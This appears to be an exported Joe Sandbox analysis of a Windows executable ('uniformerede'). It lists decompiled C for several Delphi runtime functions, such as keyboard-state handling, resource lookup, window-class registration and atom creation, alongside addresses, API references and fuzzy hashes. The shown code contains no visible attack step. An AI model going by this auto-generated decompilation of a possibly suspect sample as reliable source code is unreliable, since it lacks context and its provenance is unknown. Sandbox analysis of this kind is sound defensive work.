                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: AtomCurrentGlobal$AddressClipboardFormatHandleModuleProcProcessRegisterThreadVersion
                                                                                                                                                                                                                            • String ID: @fD
                                                                                                                                                                                                                            • API String ID: 3775504709-3452771706
                                                                                                                                                                                                                            • Opcode ID: 95a3d3956bea3f460346f6cd369638779209bac5c04267071be8a34415b91482
                                                                                                                                                                                                                            • Instruction ID: a2d0d9fa5674fa572cfd9e012cd62e1639ea6f2d0861d92eee2e079839ffb759
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 95a3d3956bea3f460346f6cd369638779209bac5c04267071be8a34415b91482
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FBF04F78214241AFE305FF2AFC5291937A4FB86314792947AF400436A6CA3CA851CB0E
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 0043C1FC Relevance: 1.6, APIs: 1, Instructions: 129COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E0043C1FC(intOrPtr* __eax, signed int* __edx) {
				signed int _v12;
				short _v14;
				char _v16;
				signed int _v20;
				intOrPtr* _v24;
				char _v280;
				signed int _t39;
				signed int _t40;
				signed int _t46;
				intOrPtr* _t47;
				signed int _t50;
				signed int _t53;
				intOrPtr _t55;
				intOrPtr _t56;
				signed int _t67;
				signed int _t68;
				void* _t73;
				signed int* _t79;
				intOrPtr _t90;
				intOrPtr* _t96;

				_t79 = __edx;
				_t96 = __eax;
				if(( *(__eax + 0x1c) & 0x00000010) == 0) {
					L4:
					_t39 =  *_t79;
					if(_t39 < 0x100 || _t39 > 0x108) {
						_t40 =  *_t79;
						__eflags = _t40 - 0x200;
						if(_t40 < 0x200) {
							L30:
							__eflags = _t40 - 0xb00b;
							if(_t40 == 0xb00b) {
								E0043AB1C(_t96, _t79[1], _t40, _t79[2]);
							}
							L32:
							return  *((intOrPtr*)( *_t96 - 0x14))();
						}
						__eflags = _t40 - 0x20a;
						if(_t40 > 0x20a) {
							goto L30;
						}
						__eflags =  *(_t96 + 0x50) & 0x00000080;
						if(( *(_t96 + 0x50) & 0x00000080) != 0) {
							L16:
							_t46 =  *_t79 - 0x200;
							__eflags = _t46;
							if(__eflags == 0) {
								L21:
								_t47 =  *0x49dbcc; // 0x49ebb8
								E0045B21C( *_t47, _t79, _t96, __eflags);
								goto L32;
							}
							_t50 = _t46 - 1;
							__eflags = _t50;
							if(_t50 == 0) {
								L22:
								__eflags =  *((char*)(_t96 + 0x5d)) - 1;
								if(__eflags != 0) {
									 *(_t96 + 0x54) =  *(_t96 + 0x54) | 0x00000001;
									goto L32;
								}
								return E00403DE8(_t96, __eflags);
							}
							_t53 = _t50 - 1;
							__eflags = _t53;
							if(_t53 == 0) {
								 *(_t96 + 0x54) =  *(_t96 + 0x54) & 0x0000fffe;
								goto L32;
							}
							__eflags = _t53 == 1;
							if(_t53 == 1) {
								goto L22;
							}
							_t55 =  *0x49eb18; // 0x0
							__eflags =  *((char*)(_t55 + 0x20));
							if( *((char*)(_t55 + 0x20)) == 0) {
								goto L32;
							} else {
								_t56 =  *0x49eb18; // 0x0
								__eflags =  *(_t56 + 0x1c);
								if( *(_t56 + 0x1c) == 0) {
									goto L32;
								}
								_t90 =  *0x49eb18; // 0x0
								__eflags =  *_t79 -  *((intOrPtr*)(_t90 + 0x1c));
								if( *_t79 !=  *((intOrPtr*)(_t90 + 0x1c))) {
									goto L32;
								}
								GetKeyboardState( &_v280);
								_v20 =  *_t79;
								_v16 = E00451924( &_v280);
								_v14 = _t79[1];
								_v12 = _t79[2];
								return E00403DE8(_t96, __eflags);
							}
							goto L21;
						}
						_t67 = _t40 - 0x203;
						__eflags = _t67;
						if(_t67 == 0) {
							L15:
							 *_t79 =  *_t79 - 2;
							__eflags =  *_t79;
							goto L16;
						}
						_t68 = _t67 - 3;
						__eflags = _t68;
						if(_t68 == 0) {
							goto L15;
						}
						__eflags = _t68 != 3;
						if(_t68 != 3) {
							goto L16;
						}
						goto L15;
					}
					_v24 = E004519E0(_t96);
					if(_v24 == 0) {
						goto L32;
					}
					_t73 =  *((intOrPtr*)( *_v24 + 0xf0))();
					if(_t73 == 0) {
						goto L32;
					}
				} else {
					_v24 = E004519E0(__eax);
					if(_v24 == 0 ||  *((intOrPtr*)(_v24 + 0x250)) == 0) {
						goto L4;
					} else {
						_t73 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v24 + 0x250)))) + 0x24))();
						if(_t73 == 0) {
							goto L4;
						}
					}
				}
				return _t73;
			}























                                                                                                                                                                                                                            0x0043c208
                                                                                                                                                                                                                            0x0043c20a
                                                                                                                                                                                                                            0x0043c210
                                                                                                                                                                                                                            0x0043c248
                                                                                                                                                                                                                            0x0043c248
                                                                                                                                                                                                                            0x0043c24f
                                                                                                                                                                                                                            0x0043c288
                                                                                                                                                                                                                            0x0043c28a
                                                                                                                                                                                                                            0x0043c28f
                                                                                                                                                                                                                            0x0043c367
                                                                                                                                                                                                                            0x0043c367
                                                                                                                                                                                                                            0x0043c36c
                                                                                                                                                                                                                            0x0043c379
                                                                                                                                                                                                                            0x0043c379
                                                                                                                                                                                                                            0x0043c37e
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0043c384
                                                                                                                                                                                                                            0x0043c295
                                                                                                                                                                                                                            0x0043c29a
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0043c2a0
                                                                                                                                                                                                                            0x0043c2a4
                                                                                                                                                                                                                            0x0043c2ba
                                                                                                                                                                                                                            0x0043c2bc
                                                                                                                                                                                                                            0x0043c2bc
                                                                                                                                                                                                                            0x0043c2c1
                                                                                                                                                                                                                            0x0043c2ce
                                                                                                                                                                                                                            0x0043c2d0
                                                                                                                                                                                                                            0x0043c2d9
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0043c2d9
                                                                                                                                                                                                                            0x0043c2c3
                                                                                                                                                                                                                            0x0043c2c3
                                                                                                                                                                                                                            0x0043c2c4
                                                                                                                                                                                                                            0x0043c2e3
                                                                                                                                                                                                                            0x0043c2e3
                                                                                                                                                                                                                            0x0043c2e7
                                                                                                                                                                                                                            0x0043c2f9
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0043c2f9
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0043c2ef
                                                                                                                                                                                                                            0x0043c2c6
                                                                                                                                                                                                                            0x0043c2c6
                                                                                                                                                                                                                            0x0043c2c7
                                                                                                                                                                                                                            0x0043c300
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0043c300
                                                                                                                                                                                                                            0x0043c2c9
                                                                                                                                                                                                                            0x0043c2ca
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0043c307
                                                                                                                                                                                                                            0x0043c30c
                                                                                                                                                                                                                            0x0043c310
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0043c312
                                                                                                                                                                                                                            0x0043c312
                                                                                                                                                                                                                            0x0043c317
                                                                                                                                                                                                                            0x0043c31b
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0043c31f
                                                                                                                                                                                                                            0x0043c325
                                                                                                                                                                                                                            0x0043c328
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0043c331
                                                                                                                                                                                                                            0x0043c338
                                                                                                                                                                                                                            0x0043c346
                                                                                                                                                                                                                            0x0043c34d
                                                                                                                                                                                                                            0x0043c354
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0043c360
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0043c310
                                                                                                                                                                                                                            0x0043c2a6
                                                                                                                                                                                                                            0x0043c2a6
                                                                                                                                                                                                                            0x0043c2ab
                                                                                                                                                                                                                            0x0043c2b7
                                                                                                                                                                                                                            0x0043c2b7
                                                                                                                                                                                                                            0x0043c2b7
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0043c2b7
                                                                                                                                                                                                                            0x0043c2ad
                                                                                                                                                                                                                            0x0043c2ad
                                                                                                                                                                                                                            0x0043c2b0
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0043c2b2
                                                                                                                                                                                                                            0x0043c2b5
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0043c2b5
                                                                                                                                                                                                                            0x0043c25f
                                                                                                                                                                                                                            0x0043c266
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0043c275
                                                                                                                                                                                                                            0x0043c27d
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0043c283
                                                                                                                                                                                                                            0x0043c212
                                                                                                                                                                                                                            0x0043c219
                                                                                                                                                                                                                            0x0043c220
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0043c22e
                                                                                                                                                                                                                            0x0043c23d
                                                                                                                                                                                                                            0x0043c242
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0043c242
                                                                                                                                                                                                                            0x0043c220
                                                                                                                                                                                                                            0x0043c38d

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetKeyboardState.USER32(?), ref: 0043C331
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: KeyboardState
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1724228437-0
                                                                                                                                                                                                                            • Opcode ID: 9f2acd7fa3e65c504f9cebf6f4804a4b530c3e7649d8a629da2463b5fec39ead
                                                                                                                                                                                                                            • Instruction ID: 91b3d7ef9cae681235685cdbb9a2033184f7e3317d8ce185dcb9f17e25b61164
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9f2acd7fa3e65c504f9cebf6f4804a4b530c3e7649d8a629da2463b5fec39ead
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1941A131A006158FDB20DBA9C4C86AFB7A1AB0E704F1491A7E801FB3A5C738DD45C79A
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 004747D8 Relevance: 1.6, APIs: 1, Instructions: 60COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 39%
                                                                                                                                                                                                                            			E004747D8(char __eax, void* __ebx, void* __edx, void* __esi) {
				char _v8;
				void* __ecx;
				CHAR* _t11;
				struct HINSTANCE__* _t12;
				struct HRSRC__* _t13;
				void* _t29;
				intOrPtr* _t33;
				struct HINSTANCE__* _t37;
				void* _t38;
				intOrPtr _t41;
				void* _t48;
				intOrPtr _t51;

				_t48 = __edx;
				_v8 = __eax;
				E00404E70(_v8);
				_push(_t51);
				_push(0x474878);
				_push( *[fs:eax]);
				 *[fs:eax] = _t51;
				_t11 = E00404E80(_v8);
				_t12 =  *0x49e668; // 0x400000
				_t13 = FindResourceA(_t12, _t11, 0xa); // executed
				if(_t13 == 0) {
					E00404A14(_t48, 0x47488c);
				} else {
					_t37 =  *0x49e668; // 0x400000
					_t33 = E0041E0D0(_t37, 1, 0xa, _v8);
					E0040500C(_t48,  *((intOrPtr*)( *_t33))());
					_push( *((intOrPtr*)( *_t33))());
					_t29 = E00404ED8(_t48);
					_pop(_t38);
					E0041D8CC(_t33, _t38, _t29);
				}
				_pop(_t41);
				 *[fs:eax] = _t41;
				_push(0x47487f);
				return E004049C0( &_v8);
			}















                                                                                                                                                                                                                            0x004747de
                                                                                                                                                                                                                            0x004747e0
                                                                                                                                                                                                                            0x004747e6
                                                                                                                                                                                                                            0x004747ed
                                                                                                                                                                                                                            0x004747ee
                                                                                                                                                                                                                            0x004747f3
                                                                                                                                                                                                                            0x004747f6
                                                                                                                                                                                                                            0x004747fe
                                                                                                                                                                                                                            0x00474804
                                                                                                                                                                                                                            0x0047480a
                                                                                                                                                                                                                            0x00474811
                                                                                                                                                                                                                            0x0047485d
                                                                                                                                                                                                                            0x00474813
                                                                                                                                                                                                                            0x00474819
                                                                                                                                                                                                                            0x0047482b
                                                                                                                                                                                                                            0x00474837
                                                                                                                                                                                                                            0x00474842
                                                                                                                                                                                                                            0x00474845
                                                                                                                                                                                                                            0x0047484e
                                                                                                                                                                                                                            0x0047484f
                                                                                                                                                                                                                            0x0047484f
                                                                                                                                                                                                                            0x00474864
                                                                                                                                                                                                                            0x00474867
                                                                                                                                                                                                                            0x0047486a
                                                                                                                                                                                                                            0x00474877

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • FindResourceA.KERNEL32(00400000,00000000,0000000A), ref: 0047480A
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: FindResource
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1635176832-0
                                                                                                                                                                                                                            • Opcode ID: eecdb2865f07ff9a271690f0d476d39d18526f90c7775773c5c6443cec6a63fb
                                                                                                                                                                                                                            • Instruction ID: 3aff7a426593e0292f2699da8adb463acbb462f0eeeb319a78e6b77317a5089b
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: eecdb2865f07ff9a271690f0d476d39d18526f90c7775773c5c6443cec6a63fb
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7B117074700204AFD300FBAADC5296AB3EDFB89714B51807AF508E7291DB39DD01875A
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 004598AC Relevance: 1.5, APIs: 1, Instructions: 24nativeCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 37%
                                                                                                                                                                                                                            			E004598AC(intOrPtr _a4) {
				intOrPtr _t26;

				_push( *((intOrPtr*)( *((intOrPtr*)(_a4 - 8)) + 8)));
				_push( *((intOrPtr*)( *((intOrPtr*)(_a4 - 8)) + 4)));
				_push( *((intOrPtr*)( *((intOrPtr*)(_a4 - 8)))));
				_t26 =  *((intOrPtr*)( *((intOrPtr*)(_a4 - 4)) + 0x30));
				_push(_t26); // executed
				L00407540(); // executed
				 *((intOrPtr*)( *((intOrPtr*)(_a4 - 8)) + 0xc)) = _t26;
				return _t26;
			}




                                                                                                                                                                                                                            0x004598b8
                                                                                                                                                                                                                            0x004598c2
                                                                                                                                                                                                                            0x004598cb
                                                                                                                                                                                                                            0x004598d2
                                                                                                                                                                                                                            0x004598d5
                                                                                                                                                                                                                            0x004598d6
                                                                                                                                                                                                                            0x004598e1
                                                                                                                                                                                                                            0x004598e5

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • NtdllDefWindowProc_A.USER32(?,?,?,?), ref: 004598D6
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: NtdllProc_Window
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 4255912815-0
                                                                                                                                                                                                                            • Opcode ID: 750cd2fd3d80466ec9001b3ae24337b2288ee7c66e095b4f83ee67adb3090f09
                                                                                                                                                                                                                            • Instruction ID: 5377867823ed044e1de45f701f66450d20e8ba5618c1584b6e86b1986842862f
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 750cd2fd3d80466ec9001b3ae24337b2288ee7c66e095b4f83ee67adb3090f09
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E6F0C579605608AFCB40DF9DC588D8AFBE8BB4C264B159195B988CB721D234FD808F90
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 004593B4 Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 132windowregistryCOMMON
                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            C-Code - Quality: 42%
                                                                                                                                                                                                                            			E004593B4(void* __eax, void* __ebx, void* __ecx) {
				struct _WNDCLASSA _v44;
				char _v48;
				char* _t22;
				long _t23;
				CHAR* _t26;
				struct HINSTANCE__* _t27;
				intOrPtr* _t29;
				signed int _t32;
				intOrPtr* _t33;
				signed int _t36;
				struct HINSTANCE__* _t37;
				void* _t39;
				CHAR* _t40;
				struct HWND__* _t41;
				char* _t47;
				char* _t52;
				long _t55;
				long _t59;
				struct HINSTANCE__* _t62;
				intOrPtr _t64;
				void* _t69;
				struct HMENU__* _t70;
				intOrPtr _t77;
				void* _t83;
				short _t88;

				_v48 = 0;
				_t69 = __eax;
				_push(_t83);
				_push(0x459555);
				_push( *[fs:eax]);
				 *[fs:eax] = _t83 + 0xffffffd4;
				if( *((char*)(__eax + 0xa4)) != 0) {
					L13:
					_pop(_t77);
					 *[fs:eax] = _t77;
					_push(0x45955c);
					return E004049C0( &_v48);
				}
				_t22 =  *0x49dc84; // 0x49e04c
				if( *_t22 != 0) {
					goto L13;
				}
				_t23 = E00422BCC(E00459934, __eax); // executed
				 *(_t69 + 0x40) = _t23;
				 *0x49bf54 = L00407540;
				_t26 =  *0x49bf74; // 0x45909c
				_t27 =  *0x49e668; // 0x400000
				if(GetClassInfoA(_t27, _t26,  &_v44) == 0) {
					_t62 =  *0x49e668; // 0x400000
					 *0x49bf60 = _t62;
					_t88 = RegisterClassA(0x49bf50);
					if(_t88 == 0) {
						_t64 =  *0x49d7fc; // 0x422f20
						E00406A70(_t64,  &_v48);
						E0040D144(_v48, 1);
						E00404378();
					}
				}
				_t29 =  *0x49d970; // 0x49e900
				_t32 =  *((intOrPtr*)( *_t29))(0) >> 1;
				if(_t88 < 0) {
					asm("adc eax, 0x0");
				}
				_t33 =  *0x49d970; // 0x49e900
				_t36 =  *((intOrPtr*)( *_t33))(1, _t32) >> 1;
				if(_t88 < 0) {
					asm("adc eax, 0x0");
				}
				_push(_t36);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_t37 =  *0x49e668; // 0x400000
				_push(_t37);
				_push(0);
				_t7 = _t69 + 0x8c; // 0x96000045
				_t39 = E00404E80( *_t7);
				_t40 =  *0x49bf74; // 0x45909c, executed
				_t41 = E00407AE4(_t40, _t39); // executed
				 *(_t69 + 0x30) = _t41;
				_t9 = _t69 + 0x8c; // 0x45150c
				E004049C0(_t9);
				 *((char*)(_t69 + 0xa4)) = 1;
				_t11 = _t69 + 0x40; // 0x10940000
				_t12 = _t69 + 0x30; // 0xe
				SetWindowLongA( *_t12, 0xfffffffc,  *_t11);
				_t47 =  *0x49da40; // 0x49eb1c
				if( *_t47 != 0) {
					_t55 = E0045A038(_t69);
					_t13 = _t69 + 0x30; // 0xe
					SendMessageA( *_t13, 0x80, 1, _t55); // executed
					_t59 = E0045A038(_t69);
					_t14 = _t69 + 0x30; // 0xe
					SetClassLongA( *_t14, 0xfffffff2, _t59); // executed
				}
				_t15 = _t69 + 0x30; // 0xe
				_t70 = GetSystemMenu( *_t15, "true");
				DeleteMenu(_t70, 0xf030, 0);
				DeleteMenu(_t70, 0xf000, 0);
				_t52 =  *0x49da40; // 0x49eb1c
				if( *_t52 != 0) {
					DeleteMenu(_t70, 0xf010, 0);
				}
				goto L13;
			}




























                                                                                                                                                                                                                            0x004593bd
                                                                                                                                                                                                                            0x004593c0
                                                                                                                                                                                                                            0x004593c4
                                                                                                                                                                                                                            0x004593c5
                                                                                                                                                                                                                            0x004593ca
                                                                                                                                                                                                                            0x004593cd
                                                                                                                                                                                                                            0x004593d7
                                                                                                                                                                                                                            0x0045953f
                                                                                                                                                                                                                            0x00459541
                                                                                                                                                                                                                            0x00459544
                                                                                                                                                                                                                            0x00459547
                                                                                                                                                                                                                            0x00459554
                                                                                                                                                                                                                            0x00459554
                                                                                                                                                                                                                            0x004593dd
                                                                                                                                                                                                                            0x004593e5
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004593f1
                                                                                                                                                                                                                            0x004593f6
                                                                                                                                                                                                                            0x004593fe
                                                                                                                                                                                                                            0x00459407
                                                                                                                                                                                                                            0x0045940d
                                                                                                                                                                                                                            0x0045941a
                                                                                                                                                                                                                            0x0045941c
                                                                                                                                                                                                                            0x00459421
                                                                                                                                                                                                                            0x00459430
                                                                                                                                                                                                                            0x00459433
                                                                                                                                                                                                                            0x00459438
                                                                                                                                                                                                                            0x0045943d
                                                                                                                                                                                                                            0x0045944c
                                                                                                                                                                                                                            0x00459451
                                                                                                                                                                                                                            0x00459451
                                                                                                                                                                                                                            0x00459433
                                                                                                                                                                                                                            0x00459458
                                                                                                                                                                                                                            0x00459461
                                                                                                                                                                                                                            0x00459463
                                                                                                                                                                                                                            0x00459465
                                                                                                                                                                                                                            0x00459465
                                                                                                                                                                                                                            0x0045946b
                                                                                                                                                                                                                            0x00459474
                                                                                                                                                                                                                            0x00459476
                                                                                                                                                                                                                            0x00459478
                                                                                                                                                                                                                            0x00459478
                                                                                                                                                                                                                            0x0045947b
                                                                                                                                                                                                                            0x0045947c
                                                                                                                                                                                                                            0x0045947e
                                                                                                                                                                                                                            0x00459480
                                                                                                                                                                                                                            0x00459482
                                                                                                                                                                                                                            0x00459484
                                                                                                                                                                                                                            0x00459489
                                                                                                                                                                                                                            0x0045948a
                                                                                                                                                                                                                            0x0045948c
                                                                                                                                                                                                                            0x00459492
                                                                                                                                                                                                                            0x0045949e
                                                                                                                                                                                                                            0x004594a3
                                                                                                                                                                                                                            0x004594a8
                                                                                                                                                                                                                            0x004594ab
                                                                                                                                                                                                                            0x004594b1
                                                                                                                                                                                                                            0x004594b6
                                                                                                                                                                                                                            0x004594bd
                                                                                                                                                                                                                            0x004594c3
                                                                                                                                                                                                                            0x004594c7
                                                                                                                                                                                                                            0x004594cc
                                                                                                                                                                                                                            0x004594d4
                                                                                                                                                                                                                            0x004594d8
                                                                                                                                                                                                                            0x004594e5
                                                                                                                                                                                                                            0x004594e9
                                                                                                                                                                                                                            0x004594f0
                                                                                                                                                                                                                            0x004594f8
                                                                                                                                                                                                                            0x004594fc
                                                                                                                                                                                                                            0x004594fc
                                                                                                                                                                                                                            0x00459503
                                                                                                                                                                                                                            0x0045950c
                                                                                                                                                                                                                            0x00459516
                                                                                                                                                                                                                            0x00459523
                                                                                                                                                                                                                            0x00459528
                                                                                                                                                                                                                            0x00459530
                                                                                                                                                                                                                            0x0045953a
                                                                                                                                                                                                                            0x0045953a
                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                              • Part of subcall function 00422BCC: VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040), ref: 00422BEA
                                                                                                                                                                                                                            • GetClassInfoA.USER32 ref: 00459413
                                                                                                                                                                                                                            • RegisterClassA.USER32 ref: 0045942B
                                                                                                                                                                                                                              • Part of subcall function 00406A70: LoadStringA.USER32 ref: 00406AA1
                                                                                                                                                                                                                            • SetWindowLongA.USER32 ref: 004594C7
                                                                                                                                                                                                                            • SendMessageA.USER32 ref: 004594E9
                                                                                                                                                                                                                            • SetClassLongA.USER32(0000000E,000000F2,00000000,0000000E,00000080,00000001,00000000,0000000E,000000FC,10940000,00451480), ref: 004594FC
                                                                                                                                                                                                                            • GetSystemMenu.USER32(0000000E,00000000,0000000E,000000FC,10940000,00451480), ref: 00459507
                                                                                                                                                                                                                            • DeleteMenu.USER32(00000000,0000F030,00000000,0000000E,00000000,0000000E,000000FC,10940000,00451480), ref: 00459516
                                                                                                                                                                                                                            • DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F030,00000000,0000000E,00000000,0000000E,000000FC,10940000,00451480), ref: 00459523
                                                                                                                                                                                                                            • DeleteMenu.USER32(00000000,0000F010,00000000,00000000,0000F000,00000000,00000000,0000F030,00000000,0000000E,00000000,0000000E,000000FC,10940000,00451480), ref: 0045953A
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Menu$ClassDelete$Long$AllocInfoLoadMessageRegisterSendStringSystemVirtualWindow
                                                                                                                                                                                                                            • String ID: /B$@u@$LI
                                                                                                                                                                                                                            • API String ID: 2103932818-2136969242
                                                                                                                                                                                                                            • Opcode ID: eae146cbbc034aa1e1cb718f7a14a071a7d93044c5fe7bbaf966ce47750368c8
                                                                                                                                                                                                                            • Instruction ID: fa4c447954f7109e74da3f6b40bcdb174dc852a7bebec26a65c914fdd247333a
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: eae146cbbc034aa1e1cb718f7a14a071a7d93044c5fe7bbaf966ce47750368c8
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 594163B1A44204AFE711EF79DD82F663798AB55704F504576FD00EB2E3DA78AC048B6C
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00446330 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 103registrylibraryloaderCOMMON
                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            C-Code - Quality: 86%
                                                                                                                                                                                                                            			E00446330(void* __ebx, void* __edi, void* __eflags) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				long _v28;
				char _v32;
				char _v36;
				intOrPtr _t25;
				short _t27;
				char _t29;
				intOrPtr _t35;
				intOrPtr _t38;
				intOrPtr _t47;
				intOrPtr _t49;
				intOrPtr* _t50;
				intOrPtr _t53;
				struct HINSTANCE__* _t63;
				intOrPtr* _t78;
				intOrPtr* _t80;
				intOrPtr _t83;
				void* _t87;

				_v20 = 0;
				_v8 = 0;
				_push(_t87);
				_push(0x4464a8);
				_push( *[fs:eax]);
				 *[fs:eax] = _t87 + 0xffffffe0;
				_v16 = GetCurrentProcessId();
				_v12 = 0;
				E0040A664("Delphi%.8X", 0,  &_v16,  &_v8);
				E00404A14(0x49eb28, _v8);
				_t25 =  *0x49eb28; // 0x0
				_t27 = GlobalAddAtomA(E00404E80(_t25)); // executed
				 *0x49eb24 = _t27;
